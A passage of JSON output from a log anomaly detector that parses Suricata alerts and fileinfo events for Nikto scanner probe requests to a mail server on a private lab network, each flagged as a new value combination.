"/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46860, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1913111561551927, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80", "/parser/model/time": 1583349514.249275, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46862, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.249681, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":201554209196080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46862, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":201554209196080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 201554209196080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80", "/parser/model/time": 1583349514.251198, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46864, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SMAIL893", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.251429, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", 
"/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46864, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 
"/parser/model/flow_id/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1038059219636916, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80", "/parser/model/time": 1583349514.25285, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", 
"/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46866, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cellsprint", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.252999, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":384781809015003,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", 